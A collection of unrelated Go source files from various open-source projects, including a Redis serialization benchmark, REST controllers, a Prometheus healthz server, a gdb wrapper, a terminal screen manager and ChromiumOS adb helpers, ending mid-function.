// Find files to load from args or use working directory
var inputPaths []string
if len(args) > 0 {
for _, inputPath := range args {
absPath := filepath.Join(wd, inputPath)
inputPaths = append(inputPaths, absPath)
}
} else {
inputPaths = append(inputPaths, wd)
}
o.InputPaths = inputPaths
return err
}
func createFolderIfNotExisting(folderPath string) error {
_, err := os.Stat(folderPath)
if !os.IsNotExist(err) {
return nil
}
parentFolder := filepath.Dir(folderPath)
info, err := os.Stat(parentFolder)
if os.IsNotExist(err) || !info.IsDir() {
return fmt.Errorf("Cannot find directory \"%s\" or it's parent directory", folderPath)
}
err = os.Mkdir(folderPath, 0777)
return err
}
|
package main
import (
"fmt"
"github.com/PROger4ever-Golang/Redis-serialization-benchmarks/implementations"
"reflect"
)
const ERROR_FORMAT = "%s: error occured while %s - %s"
func main() {
app, err := NewApplication()
if err != nil {
app.ErrorLogger.Printf(ERROR_FORMAT, "main", "configuring app", err)
return
}
defer app.Finalize()
for name, imp := range app.Implementations {
imp.Del()
srcObject := &implementations.SerializationObject{
String1: "String1", String2: "String2", String3: "String3", String4: "String4", String5: "String5",
FieldX: "FieldX",
}
err = imp.Set(srcObject)
if err != nil {
app.ErrorLogger.Printf(ERROR_FORMAT, name, "setting object", err)
continue
}
object1, err := imp.Get()
if err != nil {
app.ErrorLogger.Printf(ERROR_FORMAT, name, "getting object", err)
continue
}
isEqual := reflect.DeepEqual(srcObject, object1)
if !isEqual {
app.ErrorLogger.Printf(ERROR_FORMAT, name, "comparing src srcObject and object1", "they aren't equal")
continue
}
srcObject.FieldX = "FieldX-changed"
err = imp.SetOneField("FieldX", srcObject.FieldX)
if err != nil {
app.ErrorLogger.Printf(ERROR_FORMAT, name, "setting one field", err)
continue
}
field, err := imp.GetOneField("FieldX")
if err != nil {
app.ErrorLogger.Printf(ERROR_FORMAT, name, "getting one field", err)
continue
}
if field != srcObject.FieldX {
app.ErrorLogger.Printf(ERROR_FORMAT, name, "comparing src field and actual field", "they aren't equal")
continue
}
object2, err := imp.Get()
if err != nil {
app.ErrorLogger.Printf(ERROR_FORMAT, name, "getting object", err)
continue
}
isEqual = reflect.DeepEqual(srcObject, object2)
if !isEqual {
app.ErrorLogger.Printf(ERROR_FORMAT, name, "comparing src srcObject and object2", "they aren't equal")
continue
}
err = imp.Del()
if err != nil {
app.ErrorLogger.Printf(ERROR_FORMAT, name, "deleting object", err)
continue
}
fmt.Printf("%s, %+v\n", field, object1)
}
}
|
package controllers
import (
"encoding/json"
"github.com/astaxie/beego"
"base_service/models"
"strconv"
)
// CategoriesController operations for Categories
type SpecificationsController struct {
beego.Controller
}
// URLMapping ...
func (c *SpecificationsController) URLMapping() {
c.Mapping("Post", c.Post)
c.Mapping("Put", c.Put)
c.Mapping("Delete", c.Delete)
c.Mapping("GetOne", c.GetOne)
c.Mapping("GetAll", c.GetAll)
}
// GetAll ...
// @Title Get All
// @Description get Categories
// @Param query query string false "Filter. e.g. col1:v1,col2:v2 ..."
// @Param fields query string false "Fields returned. e.g. col1,col2 ..."
// @Param sortby query string false "Sorted-by fields. e.g. col1,col2 ..."
// @Param order query string false "Order corresponding to each sortby field, if single value, apply to all sortby fields. e.g. desc,asc ..."
// @Param limit query string false "Limit the size of result set. Must be an integer"
// @Param offset query string false "Start position of result set. Must be an integer"
// @Success 200 {object} models.Categories
// @Failure 403
// @router / [get]
//自定义开发模式
func (c *SpecificationsController) GetAll() {
beego.Debug("GetAll")
var product_id uint64
// limit: 10 (default is 10)
if v, err := c.GetUint64("product_id"); err == nil {
product_id = v
}
v := models.GetAllSpecifications(product_id)
c.Data["json"] = v
c.ServeJSON()
return
}
// Post ...
// @Title Post
// @Description create Categories
// @Param body body models.Categories true "body for Categories content"
// @Success 201 {int} models.Categories
// @Failure 403 body is empty
// @router / [post]
func (c *SpecificationsController) Post() {
beego.Debug("Post")
//var d models.Categorie
var Specifications models.SpecificationsData
err := json.Unmarshal(c.Ctx.Input.RequestBody, &Specifications)
if err == nil {
c.Data["json"] = models.AddSpecifications(&Specifications)
}else{
c.Data["json"] =models.MessageErrorUint64(0,err.Error())
}
c.ServeJSON()
return
}
// Put ...
// @Title Put
// @Description update the Categories
// @Param id path string true "The id you want to update"
// @Param body body models.Categories true "body for Categories content"
// @Success 200 {object} models.Categories
// @Failure 403 :id is not int
// @router /:id [put]
func (c *SpecificationsController) Put() {
beego.Debug("Put")
idStr := c.Ctx.Input.Param(":id")
id, _ := strconv.ParseUint(idStr,10, 64)
v := models.SpecificationsData{Id: id}
err := json.Unmarshal(c.Ctx.Input.RequestBody, &v)
if err == nil {
data := models.UpdateSpecificationsById(&v)
c.Data["json"] =data
} else {
c.Data["json"] =models.MessageErrorUint64(id,err.Error())
}
c.ServeJSON()
}
func (c *SpecificationsController) GetOne() {
beego.Debug("GetOne")
idStr := c.Ctx.Input.Param(":id")
id, _ := strconv.ParseUint(idStr,10, 64)
v := models.GetSpecificationsById(id)
c.Data["json"] = v
c.ServeJSON()
return
}
func (c *SpecificationsController) Delete() {
beego.Debug("Delete")
idStr := c.Ctx.Input.Param(":id")
id, _ := strconv.ParseUint(idStr,10, 64)
data := models.DeleteSpecifications(id)
c.Data["json"] = data
c.ServeJSON()
}
|
package configs_test
import (
"io/ioutil"
"log"
"os"
"testing"
"github.com/gabrie30/joke/configs"
"github.com/mitchellh/go-homedir"
)
func TestConfigsDefault(t *testing.T) {
got := configs.DBPath
want, err := homedir.Dir()
if err != nil {
t.Fatalf("Could not determine users home dir, try again -- err: %v", err)
}
want = want + "/.jokes.db"
if got != want {
t.Fatalf("Could not correctly setup db path, got: %v, wanted: %v", got, want)
}
}
func TestConfigsManuallySet(t *testing.T) {
file, err := ioutil.TempFile("", "test_joke_db")
defer os.Remove(file.Name())
if err != nil {
log.Fatal(err)
}
configs.DBPath = file.Name()
want := file.Name()
got := configs.DBPath
if got != want {
t.Fatalf("Could not correctly setup db path, got: %v, wanted: %v", got, want)
}
}
|
package admission
import (
"context"
"time"
"github.com/sirupsen/logrus"
apierrors "k8s.io/apimachinery/pkg/api/errors"
metav1 "k8s.io/apimachinery/pkg/apis/meta/v1"
"k8s.io/apimachinery/pkg/util/wait"
"k8s.io/client-go/kubernetes"
"github.com/harvester/harvester/pkg/webhook"
)
const (
PollingInterval = 5 * time.Second
PollingTimeout = 3 * time.Minute
)
// Wait waits for the admission webhook server to register ValidatingWebhookConfiguration and MutatingWebhookConfiguration resources.
func Wait(ctx context.Context, clientSet *kubernetes.Clientset) error {
return wait.PollImmediate(PollingInterval, PollingTimeout, func() (bool, error) {
logrus.Infof("Waiting for ValidatingWebhookConfiguration %s...", webhook.ValidatingWebhookName)
_, err := clientSet.AdmissionregistrationV1().ValidatingWebhookConfigurations().Get(ctx, webhook.ValidatingWebhookName, metav1.GetOptions{})
if err != nil {
if apierrors.IsNotFound(err) {
return false, nil
}
return false, err
}
logrus.Infof("Waiting for MutatingWebhookConfiguration %s...", webhook.MutatingWebhookName)
_, err = clientSet.AdmissionregistrationV1().MutatingWebhookConfigurations().Get(ctx, webhook.MutatingWebhookName, metav1.GetOptions{})
if err != nil {
if apierrors.IsNotFound(err) {
return false, nil
}
return false, err
}
logrus.Infof("Admission webhooks are ready")
return true, nil
})
}
|
package nissan
import (
"fmt"
"strings"
"time"
)
type Auth struct {
AuthID string `json:"authId"`
Template string `json:"template"`
Stage string `json:"stage"`
Header string `json:"header"`
Callbacks []AuthCallback `json:"callbacks"`
}
type AuthCallback struct {
Type string `json:"type"`
Output []AuthCallbackValue `json:"output"`
Input []AuthCallbackValue `json:"input"`
}
type AuthCallbackValue struct {
Name string `json:"name"`
Value string `json:"value"`
}
type Token struct {
TokenID string `json:"tokenId"`
SuccessURL string `json:"successUrl"`
Realm string `json:"realm"`
Code int `json:"code"` // error response
Reason string `json:"reason"` // error response
Message string `json:"message"` // error response
}
func (t *Token) SessionExpired() bool {
return strings.EqualFold(t.Message, "Session has timed out")
}
func (t *Token) Error() error {
if t.Code == 0 {
return nil
}
return fmt.Errorf("%s: %s", t.Reason, t.Message)
}
type Vehicles struct {
Data []Vehicle
}
type Vehicle struct {
VIN string
ModelName string
PictureURL string
}
// Request structure for kamereon api
type Request struct {
Data Payload `json:"data"`
}
type Payload struct {
Type string `json:"type"`
Attributes map[string]interface{} `json:"attributes,omitempty"`
}
type Error struct {
Status, Code, Detail string
}
// StatusResponse structure for kamereon api
type StatusResponse struct {
ID string
Attributes
Errors []Error
}
type Attributes struct {
ChargeStatus float32 `json:"chargeStatus"`
RangeHvacOff int `json:"rangeHvacOff"`
BatteryLevel int `json:"batteryLevel"`
BatteryCapacity int `json:"batteryCapacity"`
BatteryTemperature int `json:"batteryTemperature"`
PlugStatus int `json:"plugStatus"`
LastUpdateTime Timestamp `json:"lastUpdateTime"`
ChargePower int `json:"chargePower"`
RemainingTime *int `json:"chargingRemainingTime"`
RemainingToFullFast int `json:"timeRequiredToFullFast"`
RemainingToFullNormal int `json:"timeRequiredToFullNormal"`
RemainingToFullSlow int `json:"timeRequiredToFullSlow"`
}
type ActionResponse struct {
Data struct {
Type, ID string // battery refresh
} `json:"data"`
Errors []Error
}
const timeFormat = "2006-01-02T15:04:05Z"
// Timestamp implements JSON unmarshal
type Timestamp struct {
time.Time
}
// UnmarshalJSON decodes string timestamp into time.Time
func (ct *Timestamp) UnmarshalJSON(data []byte) error {
s := strings.Trim(string(data), "\"")
t, err := time.Parse(timeFormat, s)
if err == nil {
(*ct).Time = t
}
return err
}
|
package inner
import (
"net"
"reflect"
"testing"
)
func Test1(t *testing.T) {
addr, _ := net.ResolveTCPAddr("tcp", ":3333")
conn, err := net.DialTCP("tcp", nil, addr)
if err != nil {
t.Error(err)
}
t.Log(reflect.TypeOf(conn))
// conn.Re
// if _, ok := conn.(io.WriterTo); ok {
// logger.Debug("WriterTo")
// }
// Similarly, if the writer has a ReadFrom method, use it to do the copy.
// if _, ok := conn.(io.ReaderFrom); ok {
// logger.Debug("ReaderFrom")
// }
}
|
package main
import (
"net/http"
"strings"
"github.com/labstack/echo"
"github.com/labstack/echo/middleware"
"github.com/pkg/errors"
kingpin "gopkg.in/alecthomas/kingpin.v2"
"github.com/previousnext/prometheus-healthz/internal/prometheus"
)
const (
// EnvarPort for overriding the default port.
EnvarPort = "PROMETHEUS_HEALTHZ_PORT"
// EnvarPath for overriding the default path.
EnvarPath = "PROMETHEUS_HEALTHZ_PATH"
// EnvarQuery for overriding the default query.
EnvarQuery = "PROMETHEUS_HEALTHZ_QUERY"
// EnvarURI for overriding the default URI.
EnvarURI = "PROMETHEUS_HEALTHZ_URI"
// EnvarUsername for overriding the default username.
EnvarUsername = "PROMETHEUS_HEALTHZ_USERNAME"
// EnvarPassword for overriding the default password.
EnvarPassword = "PROMETHEUS_HEALTHZ_PASSWORD"
)
var (
cliPort = kingpin.Flag("port", "Port which to serv requests").Default(":80").Envar(EnvarPort).String()
cliPath = kingpin.Flag("path", "Path which to serv requests").Default("/healthz").Envar(EnvarPath).String()
cliQuery = kingpin.Flag("query", "Username used for basic authentication").Default("type=healthz").Envar(EnvarQuery).String()
cliURI = kingpin.Flag("uri", "Promtheus endpoint").Default("http://127.0.0.1:9090").Envar(EnvarURI).String()
cliUsername = kingpin.Flag("username", "Username used for basic authentication").Required().Envar(EnvarUsername).String()
cliPassword = kingpin.Flag("password", "Password used for basic authentication").Required().Envar(EnvarPassword).String()
)
func main() {
kingpin.Parse()
e := echo.New()
e.Use(middleware.LoggerWithConfig(middleware.LoggerConfig{
Format: "method=${method}, uri=${uri}, status=${status}\n",
}))
e.Use(middleware.BasicAuth(func(username, password string, c echo.Context) (bool, error) {
if username == *cliUsername && password == *cliPassword {
return true, nil
}
return false, nil
}))
e.GET(*cliPath, func(c echo.Context) error {
client, err := prometheus.New(*cliURI)
if err != nil {
return c.String(http.StatusInternalServerError, err.Error())
}
rules, err := client.Rules()
if err != nil {
return c.String(http.StatusInternalServerError, err.Error())
}
filtered, err := getHealthzRules(*cliQuery, rules)
if err != nil {
return c.String(http.StatusInternalServerError, err.Error())
}
if len(filtered) > 0 {
return c.JSON(http.StatusInternalServerError, Response{State: StateUnhealthy, Rules: filtered})
}
return c.JSON(http.StatusOK, Response{State: StateHealthy})
})
e.Logger.Fatal(e.Start(*cliPort))
}
// Helper function to return a list of rules which are "firing" and labelled "healthz".
func getHealthzRules(query string, resp prometheus.RulesResponse) ([]string, error) {
var rules []string
labels, err := getLabels(query)
if err != nil {
return rules, errors.Wrap(err, "failed to get labels from query")
}
for _, group := range resp.Data.Groups {
for _, rule := range group.Rules {
for labelKey, labelValue := range labels {
if !hasLabel(labelKey, labelValue, rule) {
continue
}
}
if !isFiring(rule) {
continue
}
rules = append(rules, rule.Name)
}
}
return rules, nil
}
// Helper function to check if the "cluster healthz" label is applied to a rule.
func hasLabel(label, value string, rule prometheus.Rule) bool {
if val, ok := rule.Labels[label]; ok {
if val == value {
return true
}
}
return false
}
// Helper function to check if a rule is "firing" an alert.
func isFiring(rule prometheus.Rule) bool {
for _, alert := range rule.Alerts {
if alert.State == prometheus.StateFiring {
return true
}
}
return false
}
// Helper function to extract a query into a key/value label pair.
func getLabels(query string) (map[string]string, error) {
labels := make(map[string]string)
list := strings.Split(query, ",")
for _, item := range list {
q := strings.Split(item, "=")
if len(q) == 2 {
var (
key = q[0]
val = q[1]
)
labels[key] = val
}
}
return labels, nil
}
|
// Copyright 2013 Chris McGee <sirnewton_01@yahoo.ca>. All rights reserved.
// Use of this source code is governed by a BSD-style
// license that can be found in the LICENSE file.
package gdblib
import ()
type ExecRunParms struct {
ThreadGroup string
AllInferiors bool
}
func (gdb *GDB) ExecRun(parms ExecRunParms) error {
descriptor := cmdDescr{forceInterrupt: true}
descriptor.cmd = "-exec-run"
if parms.AllInferiors {
descriptor.cmd = descriptor.cmd + " --all"
} else if parms.ThreadGroup != "" {
descriptor.cmd = descriptor.cmd + " --thread-group " + parms.ThreadGroup
}
descriptor.response = make(chan cmdResultRecord)
gdb.input <- descriptor
result := <-descriptor.response
err := parseResult(result, nil)
return err
}
type ExecArgsParms struct {
Args string
}
func (gdb *GDB) ExecArgs(parms ExecArgsParms) error {
descriptor := cmdDescr{}
descriptor.cmd = "-exec-arguments"
descriptor.cmd = descriptor.cmd + " " + parms.Args
descriptor.response = make(chan cmdResultRecord)
gdb.input <- descriptor
result := <-descriptor.response
err := parseResult(result, nil)
return err
}
type ExecInterruptParms struct {
// ThreadGroup string
// AllInferiors bool
}
func (gdb *GDB) ExecInterrupt(parms ExecInterruptParms) /*error*/ {
descriptor := cmdDescr{forceInterrupt: true}
// An interrupt is handled in a special way with an empty
// command that forces interrupt. This will interrupt all
// threads and make the gdb interpreter responsive to
// commands.
descriptor.cmd = ""
// descriptor.cmd = "-exec-interrupt"
// if parms.AllInferiors {
// descriptor.cmd = descriptor.cmd + " --all"
// } else if parms.ThreadGroup != "" {
// descriptor.cmd = descriptor.cmd + " --thread-group " + parms.ThreadGroup
// }
// descriptor.response = make(chan cmdResultRecord)
gdb.input <- descriptor
// result := <-descriptor.response
// err := parseResult(result, nil)
// return err
}
type ExecNextParms struct {
Reverse bool
}
func (gdb *GDB) ExecNext(parms ExecNextParms) error {
descriptor := cmdDescr{}
descriptor.cmd = "-exec-next"
if parms.Reverse {
descriptor.cmd = descriptor.cmd + " --reverse"
}
descriptor.response = make(chan cmdResultRecord)
gdb.input <- descriptor
result := <-descriptor.response
err := parseResult(result, nil)
return err
}
type ExecStepParms struct {
Reverse bool
}
func (gdb *GDB) ExecStep(parms ExecStepParms) error {
descriptor := cmdDescr{}
descriptor.cmd = "-exec-step"
if parms.Reverse {
descriptor.cmd = descriptor.cmd + " --reverse"
}
descriptor.response = make(chan cmdResultRecord)
gdb.input <- descriptor
result := <-descriptor.response
err := parseResult(result, nil)
return err
}
type ExecContinueParms struct {
Reverse bool
ThreadGroup string
AllInferiors bool
}
func (gdb *GDB) ExecContinue(parms ExecContinueParms) error {
descriptor := cmdDescr{}
descriptor.cmd = "-exec-continue"
if parms.Reverse {
descriptor.cmd = descriptor.cmd + " --reverse"
}
if parms.AllInferiors {
descriptor.cmd = descriptor.cmd + " --all"
} else if parms.ThreadGroup != "" {
descriptor.cmd = descriptor.cmd + " --thread-group " + parms.ThreadGroup
}
descriptor.response = make(chan cmdResultRecord)
gdb.input <- descriptor
result := <-descriptor.response
err := parseResult(result, nil)
return err
}
|
// +build windows
package termboxScreen
import (
"errors"
"fmt"
"time"
termbox "github.com/nsf/termbox-go"
)
const (
NoRefresh = 0
)
type Screen interface {
Id() int
Initialize(Bundle) error
HandleKeyEvent(termbox.Event) int
HandleNoneEvent(termbox.Event) int
DrawScreen()
ResizeScreen()
}
type Manager struct {
defaultFg termbox.Attribute
defaultBg termbox.Attribute
screens map[int]Screen
displayScreenId int
events chan termbox.Event
running bool
refreshRate time.Duration
}
func NewManager() *Manager {
m := Manager{
defaultFg: termbox.ColorWhite,
defaultBg: termbox.ColorBlack,
events: make(chan termbox.Event),
screens: make(map[int]Screen),
refreshRate: NoRefresh,
}
if err := termbox.Init(); err != nil {
fmt.Println("Error initializing termbox")
return nil
}
termbox.SetOutputMode(termbox.Output256)
return &m
}
func (m *Manager) SetDefaultFg(c termbox.Attribute) { m.defaultFg = c }
func (m *Manager) SetDefaultBg(c termbox.Attribute) { m.defaultBg = c }
// AddScreen adds a screen to the screens map, they're indexed by the value
// returned from the screen's Id() function
func (m *Manager) AddScreen(s Screen) {
m.screens[s.Id()] = s
// If this is the only screen we've added, set it to active
if len(m.screens) == 1 {
m.SetDisplayScreen(s.Id())
}
}
// AddAndInitializeScreen adds a screen just like AddScreen, but then
// calls it's 'Initialize' function with a blank bundle
func (m *Manager) AddAndInitializeScreen(s Screen) error {
m.AddScreen(s)
return m.InitializeScreen(s.Id(), Bundle{})
}
func (m *Manager) GetScreens() map[int]Screen {
return m.screens
}
func (m *Manager) SetDisplayScreen(id int) error {
if id == m.displayScreenId {
return nil
}
var ok bool
if _, ok = m.screens[id]; !ok {
return errors.New("Invalid Screen Id")
}
m.displayScreenId = id
return nil
}
func (m *Manager) InitializeScreen(id int, b Bundle) error {
var ok bool
if _, ok = m.screens[id]; !ok {
return errors.New("Invalid screen id")
}
return m.screens[id].Initialize(b)
}
func (m *Manager) Loop() error {
if len(m.screens) == 0 {
return errors.New("Loop cannot run without screens")
}
m.running = true
go m.pollUserEvents()
// We always start display the first screen added
m.layoutAndDrawScreen()
for {
event := <-m.events
if event.Type == termbox.EventKey {
if event.Key == termbox.KeyCtrlC {
break
} else {
newScreenIndex := m.handleKeyEvent(event)
if err := m.SetDisplayScreen(newScreenIndex); err != nil {
break
}
m.layoutAndDrawScreen()
}
} else if event.Type == termbox.EventNone {
// Type = EventNone is how we can trigger automatic events
newScreenIndex := m.handleNoneEvent(event)
if err := m.SetDisplayScreen(newScreenIndex); err != nil {
break
}
m.layoutAndDrawScreen()
} else if event.Type == termbox.EventResize {
m.resizeScreen()
m.layoutAndDrawScreen()
}
}
m.running = false
close(m.events)
m.Close()
return nil
}
func (m *Manager) SendNoneEvent() {
m.SendEvent(termbox.Event{Type: termbox.EventNone})
}
func (m *Manager) SendEvent(t termbox.Event) {
m.events <- t
}
func (m *Manager) Close() {
termbox.Close()
}
func (m *Manager) pollUserEvents() {
for m.running {
m.SendEvent(termbox.PollEvent())
}
}
func (m *Manager) SetRefreshRate(t time.Duration) {
m.refreshRate = t
go m.pollRefreshEvents()
}
func (m *Manager) pollRefreshEvents() {
if m.refreshRate > time.Microsecond {
for m.running {
time.Sleep(m.refreshRate)
m.SendNoneEvent()
}
}
}
func (m *Manager) handleKeyEvent(event termbox.Event) int {
return m.screens[m.displayScreenId].HandleKeyEvent(event)
}
func (m *Manager) handleNoneEvent(event termbox.Event) int {
return m.screens[m.displayScreenId].HandleNoneEvent(event)
}
func (m *Manager) resizeScreen() {
m.screens[m.displayScreenId].ResizeScreen()
}
func (m *Manager) drawBackground() {
termbox.Clear(0, m.defaultBg)
}
func (m *Manager) layoutAndDrawScreen() {
m.drawBackground()
m.screens[m.displayScreenId].DrawScreen()
termbox.Flush()
}
|
package graph
import "github.com/hectorhammett/graphs/node"
// Graph defines a generic graph interface
type Graph interface {
AddVertice(node.Node, node.Node)
GetNodesList() map[string]node.Node
GetAdjacencyList() map[string][]node.Node
GetNodeAdjacencyList(node.Node) []node.Node
GetNode(string) node.Node
}
|
// Copyright 2018 The Cockroach Authors.
//
// Use of this software is governed by the Business Source License
// included in the file licenses/BSL.txt.
//
// As of the Change Date specified in that file, in accordance with
// the Business Source License, use of this software will be governed
// by the Apache License, Version 2.0, included in the file
// licenses/APL.txt.
package ordering
import (
"github.com/cockroachdb/cockroach/pkg/sql/opt"
"github.com/cockroachdb/cockroach/pkg/sql/opt/memo"
"github.com/cockroachdb/cockroach/pkg/sql/opt/props"
"github.com/cockroachdb/cockroach/pkg/sql/opt/props/physical"
)
func mutationCanProvideOrdering(expr memo.RelExpr, required *physical.OrderingChoice) bool {
// The mutation operator can always pass through ordering to its input.
return true
}
func mutationBuildChildReqOrdering(
parent memo.RelExpr, required *physical.OrderingChoice, childIdx int,
) physical.OrderingChoice {
if childIdx != 0 {
return physical.OrderingChoice{}
}
// Remap each of the required columns to corresponding input columns.
private := parent.Private().(*memo.MutationPrivate)
optional := private.MapToInputCols(required.Optional)
columns := make([]physical.OrderingColumnChoice, len(required.Columns))
for i := range required.Columns {
colChoice := &required.Columns[i]
columns[i] = physical.OrderingColumnChoice{
Group: private.MapToInputCols(colChoice.Group),
Descending: colChoice.Descending,
}
}
return physical.OrderingChoice{Optional: optional, Columns: columns}
}
func mutationBuildProvided(expr memo.RelExpr, required *physical.OrderingChoice) opt.Ordering {
private := expr.Private().(*memo.MutationPrivate)
input := expr.Child(0).(memo.RelExpr)
provided := input.ProvidedPhysical().Ordering
// Construct FD set that includes mapping to/from input columns. This will
// be used by remapProvided.
var fdset props.FuncDepSet
fdset.CopyFrom(&input.Relational().FuncDeps)
private.AddEquivTableCols(expr.Memo().Metadata(), &fdset)
// Ensure that provided ordering only uses projected columns.
return remapProvided(provided, &fdset, expr.Relational().OutputCols)
}
|
package mpt
import "errors"
// GetAllKeyValuePairs of mpt and put in map
func (mpt *MerklePatriciaTrie) GetAllKeyValuePairs() map[string]string {
if len(mpt.db) == 0 {
return nil //, errors.New("Empty MPT")
}
emptyKeyValuePairs := make(map[string]string)
rootNode := mpt.db[mpt.Root]
KeyValuePairs, err := mpt.GetAllKeyValuePairsHelper(emptyKeyValuePairs, rootNode, []uint8{})
if err != nil {
return emptyKeyValuePairs
} else {
return KeyValuePairs
}
}
func (mpt *MerklePatriciaTrie) GetAllKeyValuePairsHelper(mptKeyValuePairs map[string]string, thisNode Node, hexPath []uint8) (map[string]string, error) {
currentHexPath := hexPath
switch {
case thisNode.node_type == 1:
for i := 0; i < 16; i++ {
if thisNode.branch_value[i] != "" {
newcurrentHexPath := append(currentHexPath, uint8(i)) //int should be treated as part of ascii path
mpt.GetAllKeyValuePairsHelper(mptKeyValuePairs, mpt.db[thisNode.branch_value[i]], newcurrentHexPath)
}
}
if thisNode.branch_value[16] != "" {
key := HexArraytoString(currentHexPath)
mptKeyValuePairs[key] = thisNode.branch_value[16]
}
case thisNode.node_type == 2 && is_ext_node(thisNode.flag_value.encoded_prefix) == true:
thisNodePath := compact_decode(thisNode.flag_value.encoded_prefix)
currentHexPath := append(currentHexPath, thisNodePath...) //int should be treated as part of ascii path
mpt.GetAllKeyValuePairsHelper(mptKeyValuePairs, mpt.db[thisNode.flag_value.value], currentHexPath)
case thisNode.node_type == 2 && is_ext_node(thisNode.flag_value.encoded_prefix) == false:
thisNodePath := compact_decode(thisNode.flag_value.encoded_prefix)
currentHexPath := append(currentHexPath, thisNodePath...)
key := HexArraytoString(currentHexPath)
mptKeyValuePairs[key] = thisNode.flag_value.value
default:
return nil, errors.New("Error in contructing key Value map from MPT")
}
return mptKeyValuePairs, nil
}
|
package redis
import (
"fmt"
"github.com/go-redis/redis"
"time"
)
// Config is the struct to pass the Postgres configuration.
type RedisConfig struct {
Host string
Port string
Password string
Key string
}
const REDIS_DB = 0
type ConfigStore interface {
GetKey(string) string
}
type Token struct {
Value string
Expire time.Duration
}
var client *redis.Client
// New initializes the redis
func New(config ConfigStore) error {
var redisConfig RedisConfig
// set redis config from env
redisConfig = RedisConfig{
Host: config.GetKey("redis.host"),
Port: config.GetKey("redis.port"),
Password: config.GetKey("redis.password"),
Key: config.GetKey("redis.key"),
}
client = redis.NewClient(&redis.Options{
Addr: fmt.Sprintf("%s:%s", redisConfig.Host, redisConfig.Port),
Password: fmt.Sprintf("%s", redisConfig.Password), // no password set
DB: REDIS_DB, // use default DB
})
_, err := client.Ping().Result()
if err != nil {
return err
}
return nil
} |
package reltest
import (
"context"
"io"
"testing"
"github.com/go-rel/rel"
"github.com/stretchr/testify/assert"
)
func TestIterate(t *testing.T) {
tests := []struct {
name string
result interface{}
count int
}{
{
name: "struct",
result: Book{ID: 1},
count: 1,
},
{
name: "struct pointer",
result: &Book{ID: 1},
count: 1,
},
{
name: "slice",
result: []Book{{ID: 1}, {ID: 2}},
count: 2,
},
{
name: "slice pointer",
result: &[]Book{{ID: 1}, {ID: 2}},
count: 2,
},
}
for _, test := range tests {
t.Run(test.name, func(t *testing.T) {
var (
book Book
repo = New()
query = rel.From("users")
)
repo.ExpectIterate(query, rel.BatchSize(500)).Result(test.result)
var (
count = 0
it = repo.Iterate(context.TODO(), query, rel.BatchSize(500))
)
defer it.Close()
for {
if err := it.Next(&book); err == io.EOF {
break
} else {
assert.Nil(t, err)
}
assert.NotEqual(t, 0, book.ID)
count++
}
assert.Equal(t, test.count, count)
repo.AssertExpectations(t)
})
}
}
func TestIterate_single(t *testing.T) {
var (
book Book
repo = New()
query = rel.From("users")
)
repo.ExpectIterate(query).Result(Book{ID: 1})
count := 0
it := repo.Iterate(context.TODO(), query)
defer it.Close()
for {
if err := it.Next(&book); err == io.EOF {
break
} else {
assert.Nil(t, err)
}
assert.NotEqual(t, 0, book.ID)
count++
}
assert.Equal(t, 1, count)
repo.AssertExpectations(t)
}
func TestIterate_error(t *testing.T) {
var (
book Book
repo = New()
query = rel.From("users")
)
repo.ExpectIterate(query).ConnectionClosed()
it := repo.Iterate(context.TODO(), query)
defer it.Close()
assert.Equal(t, ErrConnectionClosed, it.Next(&book))
repo.AssertExpectations(t)
}
func TestIterate_assert(t *testing.T) {
var (
repo = New()
)
repo.ExpectIterate(rel.From("users"), rel.BatchSize(10))
assert.Panics(t, func() {
repo.Iterate(context.TODO(), rel.From("books"))
})
assert.False(t, repo.AssertExpectations(nt))
assert.Equal(t, "FAIL: Mock defined but not called:\nIterate(ctx, rel.From(\"users\"), rel.BatchSize(10))", nt.lastLog)
}
func TestIterate_assert_transaction(t *testing.T) {
var (
repo = New()
)
repo.ExpectTransaction(func(repo *Repository) {
repo.ExpectIterate(rel.From("users"), rel.BatchSize(10))
})
assert.False(t, repo.AssertExpectations(nt))
assert.Equal(t, "FAIL: Mock defined but not called:\n<Transaction: 1> Iterate(ctx, rel.From(\"users\"), rel.BatchSize(10))", nt.lastLog)
}
func TestIterate_String(t *testing.T) {
var (
mockIterate = MockIterate{assert: &Assert{}, argQuery: rel.From("users"), argOptions: []rel.IteratorOption{rel.BatchSize(10), rel.Start(1), rel.Finish(10)}}
)
assert.Equal(t, "Iterate(ctx, rel.From(\"users\"), rel.BatchSize(10), rel.Start(1), rel.Finish(10))", mockIterate.String())
assert.Equal(t, "ExpectIterate(rel.From(\"users\"), rel.BatchSize(10), rel.Start(1), rel.Finish(10))", mockIterate.ExpectString())
}
|
package tableModel
// @title 基础 admin user
// @description
// @auth 晴小篆 331393627@qq.com
// @param
// role
// 1 - 超管用户
// 2 - 普通用户
// @return
type AdminUserBase struct {
ID uint `json:"id" gorm:"primarykey"`
Name string `json:"name" gorm:"not null" valid:"required~缺少用户名"`
Avatar string `json:"avatar" gorm:"comment:头像"`
Email string `json:"email" gorm:"comment:邮箱"`
Role string `json:"role" gorm:"comment:角色" valid:"required~缺少角色"`
}
type AdminUser struct {
AdminUserBase
Password string `json:"password" gorm:"not null" valid:"required~缺少密码"`
ModelStruct
}
|
package test
import (
"time"
"github.com/juntaki/transparent"
)
// NewSource returns Source
func NewSource(wait time.Duration) transparent.Layer {
test := NewStorage(wait)
layer, _ := transparent.NewLayerSource(test)
return layer
}
|
// Copyright 2020 The ChromiumOS Authors
// Use of this source code is governed by a BSD-style license that can be
// found in the LICENSE file.
// Package adb enables controlling android devices through the local adb server.
package adb
import (
"context"
"os"
"path/filepath"
"syscall"
"github.com/shirou/gopsutil/v3/process"
"chromiumos/tast/common/testexec"
"chromiumos/tast/errors"
"chromiumos/tast/testing"
)
const (
adbHome = "/tmp/adb_home"
)
// Command creates an ADB command with appropriate environment variables.
func Command(ctx context.Context, args ...string) *testexec.Cmd {
cmd := testexec.CommandContext(ctx, "adb", args...)
cmd.Env = append(
os.Environ(),
"ADB_VENDOR_KEYS="+vendorKeyPath(),
// adb expects $HOME to be writable.
"HOME="+adbHome)
return cmd
}
// KillADBLocalServer kills the existing ADB local server if it is running.
//
// We do not use adb kill-server since it is unreliable (crbug.com/855325).
// We do not use killall since it can wait for orphan adb processes indefinitely (b/137797801).
func KillADBLocalServer(ctx context.Context) error {
ps, err := process.Processes()
if err != nil {
return err
}
for _, p := range ps {
if name, err := p.Name(); err != nil || name != "adb" {
continue
}
if ppid, err := p.Ppid(); err != nil || ppid != 1 {
continue
}
if err := syscall.Kill(int(p.Pid), syscall.SIGKILL); err != nil {
// In a very rare race condition, the server process might be already gone.
// Just log the error rather than reporting it to the caller.
testing.ContextLog(ctx, "Failed to kill ADB local server process: ", err)
